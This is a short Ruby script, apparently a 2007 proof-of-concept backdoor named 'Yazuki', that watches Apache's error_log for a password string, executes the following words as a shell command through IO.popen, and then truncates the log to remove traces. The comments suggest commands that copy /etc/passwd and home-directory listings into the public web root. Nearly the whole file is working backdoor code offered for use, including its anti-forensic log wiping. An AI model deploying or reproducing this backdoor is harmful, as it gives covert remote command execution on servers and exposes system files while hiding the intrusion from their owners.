#!/usr/bin/env ruby

# Name: Yazuki
# Author: SkyOut
# Date: October 2007
# Website: http://wired-security.net/

# Used Ruby Version. 1.8.4
# Tested on: OpenBSD 4.1

# This Proof-of-Concept code shows a simple backdoor
# concept, that does not need any open port to execute
# shell commands. Yazuki will search the error_log file
# of Apache every 5 seconds for a specified password and
# executes the given command, that can have up to five
# arguments (for more, just edit line 41).

# Possible commands: (Make sure to always have five arguments
# or edit line 41)
# less /etc/passwd > /var/www/htdocs/pw.txt ;
# ls -a /home > /var/www/htdocs/home.txt

# Start an indefinite loop
x = 0
while (x == 0)

	# Define the error_log file of Apache
	error_log = "/var/www/logs/error_log"

	# Open Apaches error_log file
	if (File.file?(error_log))
		if (File.readable?(error_log))
			File.open("#{error_log}").each { |line|

				# Define the password
				if line =~ /password/
					# Make an array of the error_log line
					array = line.split(" ");
					# Take the 5 last arguments
					command = array.fetch(13) + " " + array.fetch(14) + " " + array.fetch(15) + " " + array.fetch(16) + " " + array.fetch(17)
					# Execute the command
					IO.popen("#{command}")

					# Truncate the error_log file again
					if (File.writable?(error_log))
						File.truncate(error_log, 0)
					end
				end
			}
		end
	end

	# Wait 5 seconds
	sleep 5

end